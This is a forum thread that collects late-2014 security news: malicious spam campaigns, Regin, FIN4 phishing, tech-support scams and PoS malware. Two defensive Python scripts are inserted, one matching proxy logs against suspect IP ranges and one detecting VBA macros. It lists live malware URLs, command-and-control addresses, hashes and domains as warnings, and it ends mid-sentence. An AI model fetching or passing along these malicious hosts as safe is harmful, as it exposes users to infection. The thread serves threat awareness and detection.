The link in the message downloads a file faxmessage_7241_pdf61.zip which in turn contains a malicious executable faxmessage_7241_pdf.exe which has a VirusTotal detection rate of 4/53*... connects to the following URLs:
http ://95.211.199.37 :16792/2411us3/HOME/0/51-SP3/0/
http ://95.211.199.37 :16792/2411us3/HOME/1/0/0/
http ://lasuruguayas .com/images/refus3.pnk
A file EXE1.EXE is also dropped, with a VirusTotal detection rate of just 1/54**..."
* https://www.virustotal.com/en/file/bb34a977009276411c1eafa8a60d553c8ea847d32cc6071710eff6b743269e91/analysis/1416846678/
** https://www.virustotal.com/en/file/78eeb34989ac134081e005e076a46675cd0d2b4da552b4e6fe7e388489cde550/analysis/1416846980/
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
199.26.87.212: https://www.virustotal.com/en/ip-address/199.26.87.212/information/
___
Regin: spy tool
- http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
Updated: 24 Nov 2014 - "... A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals...
Regin’s five stages:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig1-architecture.png
... Almost half of all infections targeted private individuals and small businesses. Attacks on telecoms companies appear to be designed to gain access to calls being routed through their infrastructure.
Confirmed Regin infections by sector:
> http://www.symantec.com/connect/sites/default/files/users/user-1013431/fig2-sectors.png
The discovery of Regin highlights how significant investments continue to be made into the development of tools for use in intelligence gathering. Symantec believes that many components of Regin remain undiscovered and additional functionality and versions may exist..."
> http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99
- http://community.websense.com/blogs/securitylabs/archive/2014/11/24/what-protection-can-be-offered-from-sophisticated-malware-such-as-regin.aspx
24 Nov 2014
___
Avast AV can't handle Windows fixes ??
- http://www.theregister.co.uk/2014/11/24/you_stupid_brick_pcs_running_avast_av_cant_handle_windows_fixes/
24 Nov 2014 - "Security software outfit Avast are trying to figure out why the combination of recent Windows patches and updates to the latter company's software are breaking PCs. Hordes of users have found that their PCs, especially those running Windows 8 and 8.1, grind to a halt after they apply both Microsoft's recent KB3000850 update rollup and Avast's latest automatic updates. Some users report their PCs won't boot, or take forever to apply patches... Avast forums*... Microsoft's not immune either: a Redmond thread titled Major issues with KB3000850 includes plenty of people wondering why the company issued an update incompatible with third-party software**. That criticism may not be entirely fair, as an Avast staffer has posted the following explanation for the mess:
'We have been able to simulate the problem in our lab and I think we fixed this issue. This Windows updates calls new memory related functions which are not fully compatible with Avast' ... Whatever the cause, a fair few people are rather upset with both Avast and Microsoft, with the latter company most often felt to be in the wrong..."
* https://forum.avast.com/index.php?topic=160717.0
** http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/major-issues-with-kb3000850/5cb4cddd-52da-44af-9fd5-3ae1a72b0b1a
___
FTC Obtains Court Orders Temporarily Shutting Down Massive Tech Support Scams
FTC, State of Florida Charge Companies Bilked $120 Million from Consumers for Bogus Software and Tech Support Service
- http://www.ftc.gov/news-events/press-releases/2014/11/ftc-obtains-court-orders-temporarily-shutting-down-massive-tech
Nov 19, 2014 - "At the request of the Federal Trade Commission and the State of Florida, a federal court has temporarily shut down two massive telemarketing operations that conned tens of thousands of consumers out of more than $120 million by deceptively marketing computer software and tech support services. The orders also temporarily freeze the defendants’ assets and place the businesses under the control of a court-appointed receiver. According to complaints filed by the FTC, since at least 2012, the defendants have used software designed to trick consumers into thinking there are problems with their computers, then subjected those consumers to high-pressure deceptive sales pitches for tech support products and services to fix their non-existent computer problems... In this latest action, the FTC and the State of Florida have filed two separate cases against companies who allegedly sold the -bogus- software and the deceptive telemarketing operators who allegedly sold -needless- tech support services:
- In the first case, the defendants selling software include PC Cleaner Inc.; Netcom3 Global Inc.; Netcom3 Inc., also doing business as Netcom3 Software Inc.; and Cashier Myricks, Jr. The telemarketing defendants include Inbound Call Experts LLC; Advanced Tech Supportco. LLC; PC Vitalware LLC; Super PC Support LLC; Robert D. Deignan, Paul M. Herdsman, and Justin M. Wright.
- In the second case, the defendants selling software include Boost Software Inc. and Amit Mehta, and the telemarketing defendants include Vast Tech Support LLC, also doing business as OMG Tech Help, OMG Total Protection, OMG Back Up, downloadsoftware.com, and softwaresupport.com; OMG Tech Help LLC; Success Capital LLC; Jon Paul Holdings LLC; Elliot Loewenstern; Jon-Paul Vasta; and Mark Donahue.
According to the FTC’s complaints, each scam starts with computer software that purports to enhance the security or performance of consumers’ computers. Typically, consumers download a free trial version of software that runs a computer system scan. The defendants’ software scan always identifies numerous errors on consumers’ computers, regardless of whether the computer has any performance problems..."
:fear::fear:
AplusWebMaster
2014-11-25, 16:29
FYI...
What the heck is with 104.152.215.0/25?
- http://blog.dynamoo.com/2014/11/what-heck-is-with-104152215025.html
25 Nov 2014 - "A contact gave me the heads up to an exploit-kit running on 104.152.215.90* [virustotal] which appears to be using MS16-064** among other things. 104.152.215.90 belongs to Query Foundry LLC in Wyoming, however they suballocated it to a customer... The random structure of most of the domains is an indicator of possible maliciousness. The few domains that don't meet this pattern seem to be .fr domains which look like they have been hijacked or re-registered.. and oddly they are all registered to different (often obviously fake) people at the same address in France... not much data about the range, there are a couple of domains that are also flagged as malicious:
sxzav .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=sxzav.xyz
klioz .xyz [Google diagnostics]: http://www.google.com/safebrowsing/diagnostic?site=klioz.xyz
... there is enough evidence to treat 104.152.215.0/25 as a suspect network. It does not appear to have any legitimate sites, the sites that do exist are of an unknown purpose and often have apparently fake WHOIS details for the domains. Blocking or monitoring for traffic to and from that /25 is the easiest way of doing it..."
* https://www.virustotal.com/en/ip-address/104.152.215.90/information/
** https://technet.microsoft.com/en-us/library/security/ms14-064.aspx
*** http://urlquery.net/report.php?id=1416802220951
___
Fake 'my photo' SPAM - new trojan variant
- http://blog.mxlab.eu/2014/11/25/latest-my-photo-email-contains-new-trojan-variant/
Nov 25, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “my photo”.
This email is sent from a spoofed address and has the following body:
my new photo :)
The attached file my_iphone_photo.zip contains the folder with the 54 kB large file 1my_photo.exe and the 30 kB large file 2my_photo.jpg. The trojan is known as a variant of MSIL/Injector.GMB, UDS:DangerousObject.Multi.Generic, Trojan.MSIL.BVXGen or Win32.Trojan.Inject.Auto. At the time of writing, 4 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/28993a2effd007e5d6c5453f61268c37c94c8d666156d0ebcae2e4dca004dcff/analysis/1416912927/
:fear: :mad:
AplusWebMaster
2014-11-27, 05:17
FYI...
QuickBooks Payment Overdue Spam
- http://threattrack.tumblr.com/post/103653348923/quickbooks-payment-overdue-spam
Nov 26, 2014 - "Subjects Seen:
Payment Overdue
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/22/2014 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Lucio Gee
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.
Malicious File Name and MD5:
Invoice_[-var=partorderb].zip (A3374A3639D4F8EBF105B8FFA1ACB4D1)
Invoice_0128648.scr (08AEA8B75143DC788A52568E823DD10E)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1856c0ee3c8aea258ec44e55795007bc/tumblr_inline_nfnt72zuuJ1r6pupn.png
Tagged: QuickBooks, Upatre
:fear::fear:
AplusWebMaster
2014-11-27, 15:35
FYI...
Fake HMRC SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/hmrc-taxes-application-reference-68j9-wdwk-1nmj-p0za-received-fake-pdf-malware/
27 Nov 2014 - "'HMRC taxes application with reference 68J9 WDWK 1NMJ P0ZA received' pretending to come from noreply@ taxreg.hmrc .gov.uk with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The application with reference number 68J9 WDWK 1NMJ P0ZA submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.
27 November 2014: HM Revenue & Customs – TAX.zip: Extracts to: HM Revenue & Customs – TAX.scr
Current Virus total detections: 2/56* (same malware as THIS**). This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/580df36f77762a526dced5127ae216a057314bea0b80e92e239db41f8a4f46b0/analysis/1417085413/
... Behavioural information
TCP connections
95.211.199.37: https://www.virustotal.com/en/ip-address/95.211.199.37/information/
83.125.22.167: https://www.virustotal.com/en/ip-address/83.125.22.167/information/
** http://myonlinesecurity.co.uk/info-santanderbillpayment-co-uk-fake-pdf-malware/
___
Tainted network: Crissic Solutions (167.160.160.0/19)
- http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
27 Nov 2014 - "Several IPs hosted on the Crissic Solutions range of 167.160.160.0/19 (suballocated from QuadraNet) have been hosting exploit kits in the past few days, leading to Cryptolocker and other nastiness. I analysed over 1500 sites hosted in the Crissic IP address range... and many sites were already marked as being -malicious- by Google, and some other sites obviously follow the same naming pattern and must be considered as malicious... Given the concentration of active malicious servers in 167.160.165.0/24 and 167.160.166.0/24 then I would recommend -blocking- your traffic to those ranges at least temporarily, despite there being legitimate sites in that range. You might choose to block the entire /19 of course, I will leave you to look at the evidence..."
(More detail at the dynamoo URL above.)
:fear: :mad:
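The two dynamoo posts above (104.152.215.0/25, and the Crissic Solutions 167.160.165.0/24 and 167.160.166.0/24 ranges inside 167.160.160.0/19) both end with the same advice: block or at least monitor traffic to the range. The script below is an added example, not code from dynamoo or from this thread, showing how a defender would run that advice over proxy logs: the watchlist is assembled from the ranges quoted above, the log layout (epoch, client IP, destination IP, URL) is an assumption, and the sample log lines are constructed for the demonstration.

```python
"""Check outbound proxy log lines against the suspect ranges named in the dynamoo posts.

Added example: the watchlist is built from the ranges quoted above, the log format
is an assumed "epoch client_ip dst_ip url" layout, and the sample lines are constructed.
"""
import ipaddress
import re

# (cidr, action, reason): most specific ranges first so they win over the /19
WATCHLIST = [
    ("104.152.215.0/25", "block", "exploit kit hosting, no legitimate sites (dynamoo, 25 Nov 2014)"),
    ("167.160.165.0/24", "block", "Crissic Solutions, active exploit kit servers (dynamoo, 27 Nov 2014)"),
    ("167.160.166.0/24", "block", "Crissic Solutions, active exploit kit servers (dynamoo, 27 Nov 2014)"),
    ("167.160.160.0/19", "monitor", "Crissic Solutions /19, mixed with legitimate sites (dynamoo, 27 Nov 2014)"),
]
NETWORKS = [(ipaddress.ip_network(cidr), action, why) for cidr, action, why in WATCHLIST]

LOG_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<client>\S+)\s+(?P<dst>\S+)\s+(?P<url>\S+)$")

# Constructed sample log; hosts and URLs are placeholders, not observed traffic
SAMPLE_LOG = """\
1417000001.123 10.0.0.5 104.152.215.90 http://sxzav.xyz/
1417000002.456 10.0.0.7 93.184.216.34 http://example.com/
1417000003.789 10.0.0.9 167.160.165.40 http://landing.example.invalid/
1417000004.012 10.0.0.9 167.160.170.1 http://other.example.invalid/
this line is malformed and must be skipped
"""

def lookup(ip_str):
    """Return (cidr, action, reason) for the first watchlist entry containing ip_str, or None."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return None
    for net, action, why in NETWORKS:
        if ip in net:
            return (str(net), action, why)
    return None

def scan_log(text):
    """Return one dict per log line whose destination IP falls inside a watchlisted range."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed lines are skipped rather than aborting the scan
        found = lookup(m.group("dst"))
        if found is None:
            continue
        cidr, action, why = found
        hits.append({"client": m.group("client"), "dst": m.group("dst"),
                     "url": m.group("url"), "range": cidr, "action": action, "reason": why})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['action'].upper():7} {hit['client']} -> {hit['dst']} ({hit['range']}) {hit['url']}")
```

Ordering the watchlist from most to least specific is what lets the /24s carry a "block" verdict while the surrounding /19, which dynamoo notes still contains legitimate sites, only produces "monitor" hits for review.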
AplusWebMaster
2014-11-28, 14:47
FYI...
Black Friday: deal or no deal
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-deal-or-no-deal/
Nov 27, 2014 - "... Spammers and scammers have risen to the occasion with deals that are too good to be true such as in this example for -fake- Gucci products. This was reported in a Tweet by Denis Sinegubko, from Unmask Parasites*
* http://www.unmaskparasites.com/ -- https://twitter.com/unmaskparasites
'Denis @unmaskparasites - Chinese spammers are ready for Black Friday. Found these domains in code on a hacked site: GucciBlackFridays .com, BlackFridayCDN .com'
... and also a security researcher at Sucuri** -- http://sucuri.net/ -- http://blog.sucuri.net/2014/11
The site boasts incredible prices on normally very expensive merchandise... Shoppers might get fooled by the security badges and stamps, which of course are only here for show... Traffic to these -bogus- sites will come from spam or, as in this case, from compromised websites... This code resides on the compromised server and performs different checks, in particular whether the user visiting the page is real or a search engine... When Black Friday is over, the crooks will be ready to serve you special deals for Cyber Monday... There certainly are good deals to be made during this holiday season but you really ought to be careful what you click on. You might order counterfeit goods or have your banking credentials stolen and money depleted..."
(More detail at the malwarebytes URL above.)
- https://blog.malwarebytes.org/online-security/2014/11/black-friday-and-cyber-monday-online-shopping-made-safer/
Nov 24, 2014
- http://www.trendmicro.com/vinfo/us/security/news/mobile-safety/a-guide-to-avoiding-cyber-monday-scams-on-mobile
Nov 24, 2014
- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/staying-safe-from-online-threats-this-thanksgiving
Nov 21, 2014
___
Lots of Black Friday SPAM & Phishing
- https://isc.sans.edu/diary.html?storyid=19003
2014-11-28 23:20:46 UTC - "Likely every reader out there, their friends and family, even their pets with email accounts, have received Black Friday SPAM or phishing attempts today. Our own Dr. J sent the handlers an Amazon sample for 'One Click Black Friday Rewards'.
Of course, that one click goes -nowhere- near Amazon and directs you to the likes of Black Fiday (yes, it's misspelled) at hXXp ://www.jasbuyersnet .com/cadillac/umbered/sedatest/styes/coleuses/unterrified.htm. Can't speak to the payload there, don't bother, just use it as ammo for heightened awareness and safe shopping online during these holidays, and...well, all the time. Be careful out there. :-)
Cheers and happy holidays."
___
Best Buy Order Spam
- http://threattrack.tumblr.com/post/103809164928/best-buy-order-spam
Nov 28, 2014 - "Subjects Seen:
Details of Your Order From Best Buy
Typical e-mail details:
E-shop Best Buy has received an order addressed to you which has to be confirmed by the recipient within 4 days.
Upon confirmation you may pick it in any nearest store of Best Buy.
Detailed order information is attached to the letter.
Wishing you Happy Thanksgiving!
Best Buy
Malicious File Name and MD5:
BestBuy_Order.exe (bff17aecb3cc9b0281275f801026b75d)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d119ffd996422b655f2ff200a50953b/tumblr_inline_nfrayxzYyG1r6pupn.jpg
Tagged: Best Buy, Kuluoz
:fear::fear: :mad:
AplusWebMaster
2014-12-01, 21:33
FYI...
Dridex Phish uses malicious word docs
- https://isc.sans.edu/diary.html?storyid=19011
2014-12-01 - "... During the past few months, Botnet-based campaigns have sent waves of phishing emails associated with Dridex... The emails contained malicious Word documents, and with macros enabled, these documents -infected- Windows computers with Dridex malware. Various people have posted about Dridex [1] [2], and some sites like Dynamoo's blog and TechHelpList... often report on these and other phishing campaigns... On 11 Nov 2014, I saw at least 60 emails with 'Duplicate Payment Received' in the subject line. This appeared to be a botnet-based campaign from compromised hosts at various locations across the globe... Monitoring the infection traffic on Security Onion, we found alerts for Dridex traffic from the EmergingThreats signature set (ET TROJAN Dridex POST Checkin) [3]... File hashes changed during this wave of emails, indicating at least 3 different Word documents were used. During this phishing run, Dridex malware came from IP addresses in the 62.76.185.0/24 block..."
[1] http://stopmalvertising.com/malware-reports/analysis-of-dridex-cridex-feodo-bugat.html
[2] http://www.abuse.ch/?p=8332
[3] https://isc.sans.edu/diaryimages/images/brad5.png
[4] http://doc.emergingthreats.net/2019478
62.76.185.127: https://www.virustotal.com/en/ip-address/62.76.185.127/information/
___
Fake 'New offer Job' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-offer-job-fake-pdf-malware/
1 Dec 2014 - "'New offer Job' with a zip attachment pretending to come from Job service <billiond8@ greatest3threeisland .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
New offer for you, see attached here.
There is also a version around with the subject of 'Tiket alert' pretending to come from FBR service <newspaperedixv@ greatest3threeisland .com>
Look at the attached file for more information.
Assistant Vice President, FBR service
Management Corporation
Both emails contain the same malware as does today’s version of 'my new photo malware'*
1 December 2014 : tiket.zip: Extracts to: tiket.exe
Current Virus total detections: 5/19**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/new-photo-malware/
** https://www.virustotal.com/en/file/3baa6154cae386bd89d4fce302adad6b5085cac01bcbe03c4fc709ee5173f07e/analysis/1417475226/
___
Phishing scam that hit Wall Street might work against you
- http://arstechnica.com/security/2014/12/phishing-scam-that-penetrated-wall-street-just-might-work-against-you-too/
Dec 1 2014 - "Researchers have uncovered a group of Wall Street-savvy hacks that have penetrated the e-mail accounts of more than 100 companies, a feat that has allowed them to obtain highly valuable plans concerning corporate acquisitions and other insider information.
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/outlook-phish-640x359.jpg
FIN4, as the group is known, relies on a set of extremely simple tactics that in many cases has allowed them to remain undetected since at least the middle of 2013, according to a report published Monday from security firm FireEye*. Members boast a strong command of the English language and knowledge of corporate finance and Fortune 500 culture. They use that savvy to send highly targeted spearphishing e-mails that harvest login credentials for Microsoft Outlook accounts. The group then uses compromised accounts of one employee, customer, or partner to send spearphishing e-mails to other company insiders. At times, the attackers will -inject- a malicious message into an ongoing e-mail discussion among multiple people, furthering their chances of success. E-mails are sent from the accounts of people the target knows, and they discuss mergers, acquisitions, or other topics already in progress. The attackers often bcc other recipients to make it more difficult to detect the malicious e-mail. The messages appear to be written by native English speakers and often contain previously exchanged Microsoft Office documents that embed hidden malicious macros. This results in fraudulent e-mails that are extremely hard to detect, even by some people who have been trained to spot such phishing campaigns... FireEye researchers said FIN4 members have compromised the accounts of C-level executives, legal counsel, regulatory and compliance personnel, scientists, and advisors of more than 100 companies. About 80 of them are publicly traded companies, while the remaining 20 are Wall Street firms that advise corporations on legal or securities matters or possible or pending mergers and acquisitions. As a result, the group stood to make a windfall if it used the insider information to buy or sell stocks before the information became widely known... 
Embedded in the previously stolen documents are Visual Basic Applications (VBA) macros that prompt readers to enter the Outlook user names and passwords. The scripts then funnel the credentials to servers controlled by the attackers. In other, earlier cases, the spearphishing e-mails contained links to fake Outlook Web App login pages that prompted visitors to enter their passwords. Some of the attacks FireEye observed targeted multiple parties inside law firms, consultancies, and corporations as they discussed particular pending business deals. In one instance, attackers used previously acquired access to e-mail accounts at an advisory firm to harvest information being exchanged about an acquisition under consideration involving one of its clients... the best thing any potential target can do is to educate employees how to spot phishing attacks. The FIN4 attackers have just raised the bar, so chances are most education programs should be revised to help employees spot these new and improved tactics."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
- http://www.reuters.com/video/2014/12/02/cyber-spies-steal-corporate-secrets-to-r?videoId=347691634
Dec 01, 2014
Video: 02:09
- http://www.computerworld.com/article/2853697/fireeye-suspects-fin4-hackers-are-americans-after-insider-info-to-game-stock-market.html
Dec 1, 2014
> http://core0.staticworld.net/images/article/2014/12/fin4-targets-100533260-large.idge.jpg
- http://www.theregister.co.uk/2014/12/02/malware_raids_stock_markets/
2 Dec 2014
> http://regmedia.co.uk/2014/12/02/11223.png
___
Europol and US customs seize 292 domains selling counterfeit goods
- http://www.theinquirer.net/inquirer/news/2384329/europol-and-us-customs-seize-292-domains-selling-counterfeit-goods
Dec 1, 2014 - "... Interpol in conjunction with US Immigration and Customs Enforcement has seized the domains of almost 300 websites that were selling counterfeit merchandise. The law enforcement agencies, not to mention politicians, are concerned that citizens are being taken for mugs online and cannot resist spending good money on fake rubbish... Europol said that the seizures involved 25 law enforcement agencies from 19 countries and participation from the US National Intellectual Property Rights Coordination Center... The websites offered a mix of content, ranging from luxury goods and sportswear to CDs and DVDs. The domains are now in the hands of the national governments involved in the shutdowns, and the gear is presumably facing some sort of immolation. Operation In Our Sites has closed down 1,829 domains so far..."
___
O/S Market Share - Nov 2014
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share - Nov 2014
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
___
PoS Malware 'd4re|dev1|' attacking Ticket Machines and Electronic Kiosks
- https://www.intelcrawler.com/news-24
Nov 26, 2014 - "... new type of Point-of-Sale malware called “d4re|dev1|”. This new strain of malware, which is hitting Mass Transit Systems, acts as an advanced backdoor with remote administration, having RAM scraping and keylogging features. This new POS malware find adds to a growing list of POS variants being developed by underground cyber criminals because of the high ROI when they hit payloads like a Target or Home Depot. Variants recently identified and profiled by IntelCrawler include POSCLOUD, Nemanja, JackPOS, BlackPOS, and Decebal. The exploitation of merchants is taking place on a global scale as outlined by the IntelCrawler POS infection map*.
* https://www.intelcrawler.com/analytics/pmim
... The malware has a “File Upload” option, which can be used for remote payload updating. The process of malware was masked under “PGTerm.exe” or “hkcmd.exe”, as well as legitimate names of software such as Google Chrome. Adversaries use this option for the installation of additional backdoors and tools, which allows them to avoid infrastructure limitations and security policies designed for detection. This broad lateral approach shows that serious cybercriminals are not interested in just one particular Point-of-Sale terminal – they are looking for enterprise wide network environments, having tens of connected devices accepting payments and returning larger sets of spoils to their C2 servers... As this POS malware market is evolving, new security measures are needed to combat the seemingly continuous strains being developed by the underground. In addition to consulting your PCI vendor, IntelCrawler strongly recommends encapsulating any administration channels in the -VPN- as well as limiting the software environment for operators, using proper access control lists and updated security policies..."
:fear: :mad:
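The Dridex diary and the FIN4 report above both describe Word documents carrying VBA macros as the delivery mechanism. The script below is an added example, not code from the ISC diary, FireEye or this thread: it checks the two places an Office Open XML package records a VBA project (the vbaProject.bin part and its declared content type), reports a legacy OLE2 binary for handling by a dedicated parser, and calls out a file whose extension does not advertise macros. The sample documents are constructed in memory; the vbaProject.bin content is a labelled stub, not a real VBA project.

```python
"""Flag VBA macros inside an Office Open XML attachment before it reaches a user.

Added example: inspects the vbaProject part and [Content_Types].xml of an OOXML
package; the sample packages are constructed in memory with a stub VBA part.
"""
import io
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_ENABLED_EXTS = {"docm", "dotm", "xlsm", "xltm", "xlam", "pptm", "potm", "ppam"}
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def inspect_office_file(filename, data):
    """Return {"has_macros": True/False/None, "reasons": [...]} for an attachment."""
    reasons = []
    if data.startswith(OLE2_MAGIC):
        # Legacy binary .doc/.xls: macros live in OLE streams and need an OLE parser
        return {"has_macros": None, "reasons": ["legacy OLE2 container, inspect with an OLE parser"]}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"has_macros": None, "reasons": ["not an OOXML package"]}
    vba_parts = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
    if vba_parts:
        reasons.append("vbaProject part present: " + ", ".join(vba_parts))
    try:
        content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    except KeyError:
        content_types = ""
        reasons.append("[Content_Types].xml missing")
    declares_vba = VBA_CONTENT_TYPE in content_types
    if declares_vba:
        reasons.append("content types declare a VBA project")
    has_macros = bool(vba_parts) or declares_vba
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if has_macros and ext not in MACRO_ENABLED_EXTS:
        reasons.append(f"macro content inside a .{ext} file whose extension does not advertise macros")
    return {"has_macros": has_macros, "reasons": reasons}

def build_sample_docx(with_macros):
    """Constructed sample: a minimal OOXML package, optionally carrying a stub VBA project."""
    overrides = ['<Override PartName="/word/document.xml" '
                 'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>']
    if with_macros:
        overrides.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = ('<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     '<Default Extension="xml" ContentType="application/xml"/>'
                     + "".join(overrides) + "</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            zf.writestr("word/vbaProject.bin", OLE2_MAGIC + b"stub, not a real VBA project")
    return buf.getvalue()

if __name__ == "__main__":
    for name, blob in [("Duplicate_Payment.docm", build_sample_docx(True)),
                       ("Duplicate_Payment.docx", build_sample_docx(True)),
                       ("clean.docx", build_sample_docx(False)),
                       ("old_format.doc", OLE2_MAGIC + b"...")]:
        print(name, inspect_office_file(name, blob))
```

Checking both the part name and the content type matters because an attacker controls the package layout; a mismatch between the two, or between either and the file extension, is itself worth a look. The OLE2 branch only reports the container type: the legacy .doc format the Dridex campaign favoured stores macros in OLE streams, which this OOXML check cannot read.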
AplusWebMaster
2014-12-02, 14:43
FYI...
Fake Walmart 'Order Details' SPAM opens malware site
- http://www.hoax-slayer.com/walmart-order-details-malware.shtml
Dec 2, 2014 - "Email purporting to be from Walmart claims that you can click a link to read more information about a recent order. The email is a scam... Clicking the link opens a website that contains malware. This attack is very similar to another malware campaign in which -bogus- emails claim to be from Costco*...
> http://www.hoax-slayer.com/images/walmart-order-details-malware-1.jpg
This email, which claims to be from retail giant Walmart, advises that your order is ready to be picked up at any local store. It invites you to -click-a-link- to find out more information about the supposed order... the email is -not- from Walmart and has nothing to do with any order you have made. The goal of the email is simply to trick you into clicking the link. If you receive this email, you may be concerned that fraudulent purchases have been made in your name and click the link in the hope of finding out more details... the link opens a compromised website that harbours malware. In some versions, the malicious download may start automatically. In other cases, a notice on the website may instruct you to download a file to view the order information. Generally, the download will be a .zip file that contains a .exe file inside. Clicking the .exe file will install the malware on your computer. The exact malware payload delivered in such attacks may vary... This attack closely mirrors another current malware campaign that uses emails that falsely claim to be from Costco*. Again, the email claims that you can get information about a recent purchase by clicking a link. Clicking downloads a .zip file that contains malware."
* http://www.hoax-slayer.com/costco-order-notification-malware.shtml
Nov 28, 2014
> http://www.hoax-slayer.com/images/costco-order-notification-malware-2.jpg
___
Fake 'FEDEX TRACK' 'FEDEX INFO' SPAM - contains trojan
- http://blog.mxlab.eu/2014/12/02/fake-emails-from-fedex-track-or-fedex-info-contains-trojan/
Dec 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
- Ezekiel Francis your agent FEDEX
- Bullock, Tiger P. agent FEDEX
- Quin Greer FEDEX company
This email is sent from the -spoofed- address “FEDEX TRACK <******@ care .it>”, FEDEX INFO <fedexservice@ care .info> or “FEDEX INFO <fedextechsupport@ care .org>” and has the following body:
Dear Customer!
We attempted to deliver your package on December 2th, 2014, 10:50 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the invoice that is attached to this email and visit Fedex location indicated in the receipt.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 45675665665
Expected Delivery Date: December 2th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you ...
The attached file Package.zip contains the 180 kB large file 45675665665.scr... At the time of writing, 3 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/3848d21eddfb5d70a39406bf45652f6daed3432cbd61bef50e705350904ebd3b/analysis/
___
Iran hacks target airlines, energy, defense companies
- http://www.reuters.com/article/2014/12/02/us-cybersecurity-iran-idUSKCN0JG18I20141202
Dec 2, 2014 - "Iranian hackers have infiltrated major airlines, energy companies, and defense firms around the globe over the past two years in a campaign that could eventually cause physical damage, according to U.S. cyber security firm Cylance*. The report comes as governments scramble to better understand the extent of Iran's cyber capabilities, which researchers say have grown rapidly as Tehran seeks to retaliate for Western cyber attacks on its nuclear program... The California-based company said its researchers uncovered breaches affecting more than 50 entities in 16 countries, and had evidence they were committed by the same Tehran-based group that was behind a previously reported 2013 cyber attack on a U.S. Navy network. It did not identify the companies targeted, but said they included major aerospace firms, airports and airlines, universities, energy firms, hospitals, and telecommunications operators based in the United States, Israel, China, Saudi Arabia, India, Germany, France, England and others. Cylance said it had evidence the hackers were Iranian, and added the scope and sophistication of the attacks suggested they had state backing... Cylance Chief Executive Stuart McClure said the Iranian hacking group has so far focused its campaign - dubbed Operation Cleaver - on intelligence gathering, but that it likely has the ability to launch attacks. He said researchers who succeeded in gaining access to some of the hackers' infrastructure found massive databases of user credentials and passwords from organizations including energy, transportation, and aerospace companies, as well as universities. He said they also found diagrams of energy plants, screen shots demonstrating control of the security system for a major Middle Eastern energy company, and encryption keys for a major Asian airline... Cylance said its researchers also 